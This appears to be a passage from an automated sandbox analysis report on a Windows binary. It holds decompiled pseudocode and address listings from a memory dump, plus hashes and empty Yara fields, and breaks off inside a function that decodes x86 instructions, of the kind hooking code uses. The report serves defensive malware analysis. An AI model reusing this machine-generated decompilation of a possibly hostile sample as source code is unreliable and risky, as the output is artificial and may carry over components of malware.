                                                                                                                                      							__eflags = _t421 - 0xffffffff;
                                                                                                                                      							if(_t421 == 0xffffffff) {
                                                                                                                                      								goto L11;
                                                                                                                                      							}
                                                                                                                                      							L20:
                                                                                                                                      							_t434 = _t434 + 1;
                                                                                                                                      							__eflags = _t434 - _t308[1];
                                                                                                                                      						} while (_t434 < _t308[1]);
                                                                                                                                      						goto L21;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}













































                                                                                                                                      0x7322a5ae
                                                                                                                                      0x7322a5b0
                                                                                                                                      0x7322a5bb
                                                                                                                                      0x7322a5c1
                                                                                                                                      0x7322a5c5
                                                                                                                                      0x7322a5ca
                                                                                                                                      0x7322a5d0
                                                                                                                                      0x7322a5e0
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a5e2
                                                                                                                                      0x7322a5e2
                                                                                                                                      0x7322a5ed
                                                                                                                                      0x7322a5ed
                                                                                                                                      0x7322ab6b
                                                                                                                                      0x7322ab6d
                                                                                                                                      0x7322ab6e
                                                                                                                                      0x7322abad
                                                                                                                                      0x7322abb1
                                                                                                                                      0x7322abbf
                                                                                                                                      0x7322abcd
                                                                                                                                      0x7322abcd
                                                                                                                                      0x7322abb8
                                                                                                                                      0x7322abd3
                                                                                                                                      0x7322abd8
                                                                                                                                      0x00000000
                                                                                                                                      0x7322abd8
                                                                                                                                      0x7322abbc
                                                                                                                                      0x7322abbd
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a5f7
                                                                                                                                      0x7322a5f7
                                                                                                                                      0x7322a5fb
                                                                                                                                      0x7322a702
                                                                                                                                      0x7322a702
                                                                                                                                      0x7322a707
                                                                                                                                      0x7322a818
                                                                                                                                      0x7322a81c
                                                                                                                                      0x7322a821
                                                                                                                                      0x7322a825
                                                                                                                                      0x7322a94f
                                                                                                                                      0x7322a951
                                                                                                                                      0x7322a955
                                                                                                                                      0x7322a95e
                                                                                                                                      0x7322a967
                                                                                                                                      0x7322a96b
                                                                                                                                      0x7322a974
                                                                                                                                      0x7322a97b
                                                                                                                                      0x7322a97c
                                                                                                                                      0x7322a980
                                                                                                                                      0x7322a984
                                                                                                                                      0x7322a988
                                                                                                                                      0x7322a98a
                                                                                                                                      0x7322aaf4
                                                                                                                                      0x7322aaf4
                                                                                                                                      0x7322aafc
                                                                                                                                      0x7322ab14
                                                                                                                                      0x7322ab16
                                                                                                                                      0x7322ab18
                                                                                                                                      0x7322ab52
                                                                                                                                      0x7322ab52
                                                                                                                                      0x7322ab54
                                                                                                                                      0x7322ab54
                                                                                                                                      0x7322ab57
                                                                                                                                      0x7322ab72
                                                                                                                                      0x7322ab86
                                                                                                                                      0x7322ab89
                                                                                                                                      0x7322ab8e
                                                                                                                                      0x7322ab99
                                                                                                                                      0x7322ab9a
                                                                                                                                      0x7322ab9d
                                                                                                                                      0x7322ab9f
                                                                                                                                      0x7322aba8
                                                                                                                                      0x00000000
                                                                                                                                      0x7322aba8
                                                                                                                                      0x7322ab59
                                                                                                                                      0x7322ab5d
                                                                                                                                      0x7322ab66
                                                                                                                                      0x00000000
                                                                                                                                      0x7322ab66
                                                                                                                                      0x7322ab29
                                                                                                                                      0x7322ab39
                                                                                                                                      0x7322ab3d
                                                                                                                                      0x7322ab3d
                                                                                                                                      0x7322ab40
                                                                                                                                      0x7322ab43
                                                                                                                                      0x7322ab46
                                                                                                                                      0x7322ab4c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322ab4e
                                                                                                                                      0x7322a992
                                                                                                                                      0x7322a992
                                                                                                                                      0x7322a994
                                                                                                                                      0x7322a998
                                                                                                                                      0x7322a99d
                                                                                                                                      0x7322a99f
                                                                                                                                      0x7322a9a3
                                                                                                                                      0x7322a9a6
                                                                                                                                      0x7322a9ae
                                                                                                                                      0x7322a9b0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a9c7
                                                                                                                                      0x7322a9e2
                                                                                                                                      0x7322a9e4
                                                                                                                                      0x7322a9f7
                                                                                                                                      0x7322a9f9
                                                                                                                                      0x7322a9fb
                                                                                                                                      0x7322aa16
                                                                                                                                      0x7322aa16
                                                                                                                                      0x7322aa1a
                                                                                                                                      0x7322aa1c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322aa1e
                                                                                                                                      0x7322aa21
                                                                                                                                      0x7322aa42
                                                                                                                                      0x7322aa61
                                                                                                                                      0x7322aa67
                                                                                                                                      0x7322aa6a
                                                                                                                                      0x7322aa6f
                                                                                                                                      0x7322aa70
                                                                                                                                      0x7322aa74
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322aa7c
                                                                                                                                      0x7322aa7c
                                                                                                                                      0x7322aa7e
                                                                                                                                      0x7322aa8a
                                                                                                                                      0x7322aa96
                                                                                                                                      0x7322aaa0
                                                                                                                                      0x7322aaa3
                                                                                                                                      0x7322aaa6
                                                                                                                                      0x7322aaaa
                                                                                                                                      0x7322aab1
                                                                                                                                      0x7322aab5
                                                                                                                                      0x7322aab9
                                                                                                                                      0x7322aaba
                                                                                                                                      0x7322aabe
                                                                                                                                      0x7322aac3
                                                                                                                                      0x7322aac8
                                                                                                                                      0x7322aacc
                                                                                                                                      0x7322aad0
                                                                                                                                      0x7322aad6
                                                                                                                                      0x7322aadc
                                                                                                                                      0x7322aae2
                                                                                                                                      0x7322aae8
                                                                                                                                      0x7322aaed
                                                                                                                                      0x7322aaee
                                                                                                                                      0x7322aaee
                                                                                                                                      0x00000000
                                                                                                                                      0x7322aa7e
                                                                                                                                      0x00000000
                                                                                                                                      0x7322aa21
                                                                                                                                      0x7322a9ff
                                                                                                                                      0x7322aa10
                                                                                                                                      0x7322aa12
                                                                                                                                      0x7322aa14
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322aa14
                                                                                                                                      0x7322aa27
                                                                                                                                      0x00000000
                                                                                                                                      0x7322aa27
                                                                                                                                      0x7322a82b
                                                                                                                                      0x7322a82e
                                                                                                                                      0x7322a830
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a838
                                                                                                                                      0x7322a838
                                                                                                                                      0x7322a83a
                                                                                                                                      0x7322a83a
                                                                                                                                      0x7322a84b
                                                                                                                                      0x7322a84d
                                                                                                                                      0x7322a850
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a946
                                                                                                                                      0x7322a947
                                                                                                                                      0x7322a949
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a949
                                                                                                                                      0x7322a856
                                                                                                                                      0x7322a859
                                                                                                                                      0x7322a863
                                                                                                                                      0x7322a868
                                                                                                                                      0x7322a86a
                                                                                                                                      0x7322a870
                                                                                                                                      0x7322a877
                                                                                                                                      0x7322a87b
                                                                                                                                      0x7322a880
                                                                                                                                      0x7322a884
                                                                                                                                      0x7322acbf
                                                                                                                                      0x7322acd3
                                                                                                                                      0x7322acf6
                                                                                                                                      0x7322acfb
                                                                                                                                      0x7322acfb
                                                                                                                                      0x7322a89b
                                                                                                                                      0x7322a8a0
                                                                                                                                      0x7322a8a0
                                                                                                                                      0x7322a8a0
                                                                                                                                      0x7322a8a0
                                                                                                                                      0x7322a8a6
                                                                                                                                      0x7322a8ab
                                                                                                                                      0x7322a8ad
                                                                                                                                      0x7322a8b2
                                                                                                                                      0x7322a8b9
                                                                                                                                      0x7322a8be
                                                                                                                                      0x7322a8c0
                                                                                                                                      0x7322ac7d
                                                                                                                                      0x7322ac8e
                                                                                                                                      0x7322aca8
                                                                                                                                      0x7322acad
                                                                                                                                      0x7322acad
                                                                                                                                      0x7322a8d6
                                                                                                                                      0x7322a8db
                                                                                                                                      0x7322a8db
                                                                                                                                      0x7322a8db
                                                                                                                                      0x7322a8db
                                                                                                                                      0x7322a8ef
                                                                                                                                      0x7322a90d
                                                                                                                                      0x7322a912
                                                                                                                                      0x7322a922
                                                                                                                                      0x7322a93f
                                                                                                                                      0x7322a941
                                                                                                                                      0x7322a941
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a859
                                                                                                                                      0x7322a70f
                                                                                                                                      0x7322a70f
                                                                                                                                      0x7322a711
                                                                                                                                      0x7322a718
                                                                                                                                      0x7322a726
                                                                                                                                      0x7322a728
                                                                                                                                      0x7322a72b
                                                                                                                                      0x7322a732
                                                                                                                                      0x7322a734
                                                                                                                                      0x7322a765
                                                                                                                                      0x7322a774
                                                                                                                                      0x7322a776
                                                                                                                                      0x7322a778
                                                                                                                                      0x7322a796
                                                                                                                                      0x7322a798
                                                                                                                                      0x7322a79a
                                                                                                                                      0x7322a7ad
                                                                                                                                      0x7322a7cc
                                                                                                                                      0x7322a7d2
                                                                                                                                      0x7322a7d5
                                                                                                                                      0x7322a7ec
                                                                                                                                      0x7322a808
                                                                                                                                      0x7322a80a
                                                                                                                                      0x7322a80a
                                                                                                                                      0x7322a80a
                                                                                                                                      0x7322a80a
                                                                                                                                      0x7322a79a
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a778
                                                                                                                                      0x7322a738
                                                                                                                                      0x7322a738
                                                                                                                                      0x7322a73a
                                                                                                                                      0x7322a74b
                                                                                                                                      0x7322a74d
                                                                                                                                      0x7322a74f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a75b
                                                                                                                                      0x7322a75c
                                                                                                                                      0x7322a763
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a763
                                                                                                                                      0x7322a751
                                                                                                                                      0x7322a754
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a80d
                                                                                                                                      0x7322a80d
                                                                                                                                      0x7322a80e
                                                                                                                                      0x7322a80e
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a601
                                                                                                                                      0x7322a603
                                                                                                                                      0x7322a603
                                                                                                                                      0x7322a605
                                                                                                                                      0x7322a60c
                                                                                                                                      0x7322a61a
                                                                                                                                      0x7322a61c
                                                                                                                                      0x7322a620
                                                                                                                                      0x7322a624
                                                                                                                                      0x7322a626
                                                                                                                                      0x7322a654
                                                                                                                                      0x7322a657
                                                                                                                                      0x7322a65c
                                                                                                                                      0x7322a660
                                                                                                                                      0x7322a665
                                                                                                                                      0x7322a66c
                                                                                                                                      0x7322a671
                                                                                                                                      0x7322a673
                                                                                                                                      0x7322ac3a
                                                                                                                                      0x7322ac4b
                                                                                                                                      0x7322ac6b
                                                                                                                                      0x7322ac70
                                                                                                                                      0x7322ac70
                                                                                                                                      0x7322a689
                                                                                                                                      0x7322a68e
                                                                                                                                      0x7322a68e
                                                                                                                                      0x7322a68e
                                                                                                                                      0x7322a68e
                                                                                                                                      0x7322a6a0
                                                                                                                                      0x7322a6a2
                                                                                                                                      0x7322a6a4
                                                                                                                                      0x7322a6b5
                                                                                                                                      0x7322a6b5
                                                                                                                                      0x7322a6bb
                                                                                                                                      0x7322a6c0
                                                                                                                                      0x7322a6c4
                                                                                                                                      0x7322a6ca
                                                                                                                                      0x7322a6d1
                                                                                                                                      0x7322a6d6
                                                                                                                                      0x7322a6d8
                                                                                                                                      0x7322abee
                                                                                                                                      0x7322abff
                                                                                                                                      0x7322ac20
                                                                                                                                      0x7322ac25
                                                                                                                                      0x7322ac25
                                                                                                                                      0x7322a6ef
                                                                                                                                      0x7322a6f4
                                                                                                                                      0x7322a6f4
                                                                                                                                      0x7322a6f4
                                                                                                                                      0x7322a6f4
                                                                                                                                      0x7322a6f7
                                                                                                                                      0x7322a6f7
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a6f7
                                                                                                                                      0x7322a62a
                                                                                                                                      0x7322a62a
                                                                                                                                      0x7322a62c
                                                                                                                                      0x7322a63d
                                                                                                                                      0x7322a63f
                                                                                                                                      0x7322a641
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a64d
                                                                                                                                      0x7322a64e
                                                                                                                                      0x7322a652
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a652
                                                                                                                                      0x7322a643
                                                                                                                                      0x7322a646
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a6f8
                                                                                                                                      0x7322a6f8
                                                                                                                                      0x7322a6f9
                                                                                                                                      0x7322a6f9
                                                                                                                                      0x00000000
                                                                                                                                      0x7322a605
                                                                                                                                      0x7322a5fb

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: eb5565c71ed7c2444f74a77e379bf62dfae5f06c7d31298e9c9b80e27dbc79d3
                                                                                                                                      • Instruction ID: 0927ba8865bbfd748c012e9fc33a87af39a5c87e594ccb6b92ba18942ede1a4d
                                                                                                                                      • Opcode Fuzzy Hash: eb5565c71ed7c2444f74a77e379bf62dfae5f06c7d31298e9c9b80e27dbc79d3
                                                                                                                                      • Instruction Fuzzy Hash: 41129071509301AFD744DF24CC80B6EBBF5EF95612F024A29E89A972A0DF70DC91CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E732392DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                      				signed int _t250;
                                                                                                                                      				signed char _t251;
                                                                                                                                      				signed char* _t254;
                                                                                                                                      				char _t255;
                                                                                                                                      				signed short _t256;
                                                                                                                                      				char _t257;
                                                                                                                                      				signed short _t260;
                                                                                                                                      				signed int _t261;
                                                                                                                                      				signed int _t262;
                                                                                                                                      				void* _t264;
                                                                                                                                      				void* _t272;
                                                                                                                                      				void* _t273;
                                                                                                                                      				signed short* _t274;
                                                                                                                                      				signed char _t275;
                                                                                                                                      				signed int _t277;
                                                                                                                                      				signed int _t278;
                                                                                                                                      				void* _t282;
                                                                                                                                      				signed int _t288;
                                                                                                                                      				unsigned int _t290;
                                                                                                                                      				signed int _t292;
                                                                                                                                      				signed int _t293;
                                                                                                                                      				signed int _t294;
                                                                                                                                      				signed int _t295;
                                                                                                                                      				unsigned int _t296;
                                                                                                                                      				unsigned int _t297;
                                                                                                                                      				signed int _t299;
                                                                                                                                      				unsigned int _t301;
                                                                                                                                      				signed char _t302;
                                                                                                                                      				signed int _t304;
                                                                                                                                      				signed char _t307;
                                                                                                                                      				signed char _t308;
                                                                                                                                      				signed int _t309;
                                                                                                                                      				void* _t312;
                                                                                                                                      				void* _t313;
                                                                                                                                      				signed int _t314;
                                                                                                                                      				signed int _t316;
                                                                                                                                      				signed int _t319;
                                                                                                                                      				signed int _t321;
                                                                                                                                      				signed int _t338;
                                                                                                                                      				signed int _t339;
                                                                                                                                      				signed int _t343;
                                                                                                                                      				signed int _t345;
                                                                                                                                      				unsigned int* _t346;
                                                                                                                                      				unsigned int _t354;
                                                                                                                                      				signed int _t355;
                                                                                                                                      				void* _t357;
                                                                                                                                      				signed int _t364;
                                                                                                                                      				signed int _t366;
                                                                                                                                      				signed int _t383;
                                                                                                                                      				signed int _t388;
                                                                                                                                      				signed int _t391;
                                                                                                                                      				signed int _t395;
                                                                                                                                      				signed int _t396;
                                                                                                                                      				signed int _t397;
                                                                                                                                      				signed int _t398;
                                                                                                                                      				signed int _t399;
                                                                                                                                      				signed int _t400;
                                                                                                                                      				signed int _t403;
                                                                                                                                      				signed int _t408;
                                                                                                                                      				signed int _t411;
                                                                                                                                      				signed int _t412;
                                                                                                                                      				signed int _t413;
                                                                                                                                      				signed int _t417;
                                                                                                                                      				signed int _t419;
                                                                                                                                      				signed int _t424;
                                                                                                                                      				void* _t426;
                                                                                                                                      				signed int* _t427;
                                                                                                                                      
                                                                                                                                      				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
                                                                                                                                      				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
                                                                                                                                      				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
                                                                                                                                      				_t274 =  *(_t426 + 0x48);
                                                                                                                                      				E732335D4( *(_t426 + 0x48), 0, 0x1c);
                                                                                                                                      				_t427 = _t426 + 0xc;
                                                                                                                                      				_t338 = 0;
                                                                                                                                      				_t282 = 0x10;
                                                                                                                                      				do {
                                                                                                                                      					_t250 =  *_t274 & 0x000000ff;
                                                                                                                                      					_t274 =  &(_t274[0]);
                                                                                                                                      					if(_t250 == 0xf3) {
                                                                                                                                      						_t383 = _t427[0x10];
                                                                                                                                      						_t339 = _t338 | 0x00000004;
                                                                                                                                      						L17:
                                                                                                                                      						_t338 = _t339 & 0x000000ff;
                                                                                                                                      						 *(_t383 + 1) = _t250;
                                                                                                                                      						goto L18;
                                                                                                                                      					}
                                                                                                                                      					if(_t250 == 0xf2) {
                                                                                                                                      						_t383 = _t427[0x10];
                                                                                                                                      						_t339 = _t338 | 0x00000002;
                                                                                                                                      						goto L17;
                                                                                                                                      					}
                                                                                                                                      					if(_t250 == 0xf0) {
                                                                                                                                      						_t338 = (_t338 | 0x00000020) & 0x000000ff;
                                                                                                                                      						 *(_t427[0x10] + 2) = _t250;
                                                                                                                                      						goto L18;
                                                                                                                                      					}
                                                                                                                                      					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
                                                                                                                                      						L13:
                                                                                                                                      						_t338 = (_t338 | 0x00000040) & 0x000000ff;
                                                                                                                                      						 *(_t427[0x10] + 3) = _t250;
                                                                                                                                      					} else {
                                                                                                                                      						_t6 = _t250 - 0x64; // -100
                                                                                                                                      						if(_t6 <= 1) {
                                                                                                                                      							goto L13;
                                                                                                                                      						}
                                                                                                                                      						if(_t250 == 0x66) {
                                                                                                                                      							_t338 = (_t338 | 0x00000008) & 0x000000ff;
                                                                                                                                      							 *(_t427[0x10] + 4) = _t250;
                                                                                                                                      							goto L18;
                                                                                                                                      						}
                                                                                                                                      						if(_t250 != 0x67) {
                                                                                                                                      							break;
                                                                                                                                      						} else {
                                                                                                                                      							_t338 = _t338 | 0x00000010;
                                                                                                                                      							 *(_t427[0x10] + 5) = _t250;
                                                                                                                                      							goto L18;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					L18:
                                                                                                                                      					_t282 = _t282 + 0xff;
                                                                                                                                      				} while (_t282 != 0);
                                                                                                                                      				_t388 = _t427[0x10];
                                                                                                                                      				_t285 =  !=  ? _t338 : 1;
                                                                                                                                      				_t343 = _t338 << 0x17;
                                                                                                                                      				 *(_t388 + 6) = _t250;
                                                                                                                                      				 *_t427 =  !=  ? _t338 : 1;
                                                                                                                                      				 *(_t388 + 0x18) = _t343;
                                                                                                                                      				if(_t250 == 0xf) {
                                                                                                                                      					_t250 =  *_t274 & 0x000000ff;
                                                                                                                                      					_t274 =  &(_t274[0]);
                                                                                                                                      					_t427[5] = _t250;
                                                                                                                                      					 *(_t427[0x10] + 7) = _t250;
                                                                                                                                      					_t427[2] = _t427[4] + 0x4a;
                                                                                                                                      				} else {
                                                                                                                                      					_t22 = _t250 - 0xa0; // -160
                                                                                                                                      					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
                                                                                                                                      					if(_t22 <= 3) {
                                                                                                                                      						_t424 =  *_t427;
                                                                                                                                      						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
                                                                                                                                      						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t354 = _t250 >> 2;
                                                                                                                                      				_t391 = _t250 & 0x00000003;
                                                                                                                                      				_t345 = _t427[2];
                                                                                                                                      				_t427[3] = _t391;
                                                                                                                                      				_t427[6] = _t354;
                                                                                                                                      				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
                                                                                                                                      				_t427[1] = _t288;
                                                                                                                                      				if(_t288 == 0xff) {
                                                                                                                                      					_t343 = _t343 + 0x3000;
                                                                                                                                      					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
                                                                                                                                      					 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                      					_t427[1] = _t288;
                                                                                                                                      				}
                                                                                                                                      				if((_t427[1] & 0x00000080) != 0) {
                                                                                                                                      					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
                                                                                                                                      					_t427[1] = _t290;
                                                                                                                                      					_t395 = _t290 >> 8;
                                                                                                                                      				} else {
                                                                                                                                      					_t395 = 0;
                                                                                                                                      				}
                                                                                                                                      				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
                                                                                                                                      					_t343 = _t343 | 0x00003000;
                                                                                                                                      					 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                      				}
                                                                                                                                      				if((_t427[1] & 0x00000001) == 0) {
                                                                                                                                      					if(( *_t427 & 0x00000020) != 0) {
                                                                                                                                      						_t343 = _t343 | 0x00009000;
                                                                                                                                      						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                      					}
                                                                                                                                      					goto L114;
                                                                                                                                      				} else {
                                                                                                                                      					_t355 = _t427[0x10];
                                                                                                                                      					_t343 = _t343 | 0x00000001;
                                                                                                                                      					 *(_t355 + 0x18) = _t343;
                                                                                                                                      					_t296 =  *_t274 & 0x000000ff;
                                                                                                                                      					_t346 =  &(_t427[6]);
                                                                                                                                      					 *_t346 = _t296;
                                                                                                                                      					 *(_t355 + 8) = _t296;
                                                                                                                                      					_t297 = _t296 >> 6;
                                                                                                                                      					_t427[3] = _t297;
                                                                                                                                      					 *(_t355 + 9) = _t297;
                                                                                                                                      					_t299 =  *_t346 & 0x00000007;
                                                                                                                                      					_t427[7] = _t299;
                                                                                                                                      					 *(_t355 + 0xb) = _t299;
                                                                                                                                      					_t301 =  *_t346 & 0x0000003f;
                                                                                                                                      					 *_t346 = _t301;
                                                                                                                                      					_t302 = _t301 >> 3;
                                                                                                                                      					_t427[2] = _t302;
                                                                                                                                      					 *(_t355 + 0xa) = _t302;
                                                                                                                                      					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
                                                                                                                                      						_t343 = _t343 | 0x00003000;
                                                                                                                                      						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                      					}
                                                                                                                                      					if(_t427[5] == 0) {
                                                                                                                                      						_t80 = _t250 - 0xd9; // -217
                                                                                                                                      						if(_t80 <= 6) {
                                                                                                                                      							_t81 = _t250 + 0x27; // 0x27
                                                                                                                                      							_t417 = _t81 & 0x000000ff;
                                                                                                                                      							if(_t427[3] != 3) {
                                                                                                                                      								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
                                                                                                                                      							} else {
                                                                                                                                      								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
                                                                                                                                      							}
                                                                                                                                      							if((_t419 & 0x00000080) != 0) {
                                                                                                                                      								_t343 = _t343 | 0x00003000;
                                                                                                                                      								 *(_t427[0x10] + 0x18) = _t343;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					if(( *_t427 & 0x00000020) == 0) {
                                                                                                                                      						L52:
                                                                                                                                      						if(_t427[5] == 0) {
                                                                                                                                      							if(_t250 == 0x8c) {
                                                                                                                                      								L85:
                                                                                                                                      								if(_t427[2] <= 5) {
                                                                                                                                      									L87:
                                                                                                                                      									_t427[5] = _t274[0];
                                                                                                                                      									_t427[4] =  &(_t274[1]);
                                                                                                                                      									if(_t427[2] <= 1) {
                                                                                                                                      										if(_t250 != 0xf6) {
                                                                                                                                      											_t309 = _t427[1];
                                                                                                                                      											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
                                                                                                                                      											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
                                                                                                                                      										} else {
                                                                                                                                      											_t427[1] = _t427[1] | 0xffffff82;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									if(_t427[3] == 0) {
                                                                                                                                      										if(( *_t427 & 0x00000010) == 0) {
                                                                                                                                      											_t264 = 4;
                                                                                                                                      											_t357 =  ==  ? _t264 : 0;
                                                                                                                                      										} else {
                                                                                                                                      											_t273 = 2;
                                                                                                                                      											_t357 =  ==  ? _t273 : 0;
                                                                                                                                      										}
                                                                                                                                      									} else {
                                                                                                                                      										if(_t427[3] == 1) {
                                                                                                                                      											_t357 = 1;
                                                                                                                                      										} else {
                                                                                                                                      											if(_t427[3] == 2) {
                                                                                                                                      												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
                                                                                                                                      											} else {
                                                                                                                                      												_t357 = 0;
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
                                                                                                                                      										_t307 = _t427[5];
                                                                                                                                      										_t343 = _t343 | 0x00000002;
                                                                                                                                      										_t403 = _t427[0x10];
                                                                                                                                      										_t427[4] =  &(_t274[1]);
                                                                                                                                      										 *(_t403 + 0xc) = _t307;
                                                                                                                                      										_t308 = _t307 & 0x00000007;
                                                                                                                                      										 *(_t403 + 0x18) = _t343;
                                                                                                                                      										 *(_t403 + 0xd) = _t307 >> 6;
                                                                                                                                      										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
                                                                                                                                      										 *(_t403 + 0xf) = _t308;
                                                                                                                                      										if(_t308 == 5) {
                                                                                                                                      											_t272 = 4;
                                                                                                                                      											_t357 =  ==  ? _t272 : _t357;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									if(_t357 == 1) {
                                                                                                                                      										_t304 = _t427[0x10];
                                                                                                                                      										_t343 = _t343 | 0x00000020;
                                                                                                                                      										 *(_t304 + 0x18) = _t343;
                                                                                                                                      										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
                                                                                                                                      									} else {
                                                                                                                                      										if(_t357 == 2) {
                                                                                                                                      											_t277 = _t427[0x10];
                                                                                                                                      											_t343 = _t343 | 0x00000040;
                                                                                                                                      											 *(_t277 + 0x18) = _t343;
                                                                                                                                      											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
                                                                                                                                      										} else {
                                                                                                                                      											if(_t357 == 4) {
                                                                                                                                      												_t278 = _t427[0x10];
                                                                                                                                      												_t343 = _t343 | 0x00000080;
                                                                                                                                      												 *(_t278 + 0x18) = _t343;
                                                                                                                                      												 *(_t278 + 0x14) =  *(_t427[4] - 1);
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									_t195 = _t427[4] - 1; // -1
                                                                                                                                      									_t274 = _t357 + _t195;
                                                                                                                                      									L114:
                                                                                                                                      									_t251 = _t427[1];
                                                                                                                                      									_t292 = _t251 & 0x00000040;
                                                                                                                                      									if((_t251 & 0x00000010) == 0) {
                                                                                                                                      										L121:
                                                                                                                                      										if((_t427[1] & 0x00000004) == 0) {
                                                                                                                                      											L129:
                                                                                                                                      											if((_t427[1] & 0x00000002) != 0) {
                                                                                                                                      												_t396 = _t427[0x10];
                                                                                                                                      												_t343 = _t343 | 0x00000004;
                                                                                                                                      												 *(_t396 + 0x18) = _t343;
                                                                                                                                      												_t257 =  *_t274;
                                                                                                                                      												_t274 =  &(_t274[0]);
                                                                                                                                      												 *((char*)(_t396 + 0x10)) = _t257;
                                                                                                                                      											}
                                                                                                                                      											if(_t292 == 0) {
                                                                                                                                      												if((_t427[1] & 0x00000020) != 0) {
                                                                                                                                      													_t293 = _t427[0x10];
                                                                                                                                      													_t343 = _t343 | 0x00000104;
                                                                                                                                      													 *(_t293 + 0x18) = _t343;
                                                                                                                                      													_t255 =  *_t274;
                                                                                                                                      													_t274 =  &(_t274[0]);
                                                                                                                                      													 *((char*)(_t293 + 0x10)) = _t255;
                                                                                                                                      												}
                                                                                                                                      												goto L135;
                                                                                                                                      											} else {
                                                                                                                                      												L132:
                                                                                                                                      												_t294 = _t427[0x10];
                                                                                                                                      												_t343 = _t343 | 0x00000110;
                                                                                                                                      												 *(_t294 + 0x18) = _t343;
                                                                                                                                      												_t256 =  *_t274;
                                                                                                                                      												_t274 =  &(_t274[2]);
                                                                                                                                      												 *(_t294 + 0x10) = _t256;
                                                                                                                                      												L135:
                                                                                                                                      												_t275 = _t274 - _t427[0xf];
                                                                                                                                      												if(_t275 <= 0xf) {
                                                                                                                                      													 *(_t427[0x10]) = _t275;
                                                                                                                                      												} else {
                                                                                                                                      													_t254 = _t427[0x10];
                                                                                                                                      													_t275 = 0xf;
                                                                                                                                      													_t254[0x18] = _t343 | 0x00005000;
                                                                                                                                      													 *_t254 = _t275;
                                                                                                                                      												}
                                                                                                                                      												return _t275 & 0x000000ff;
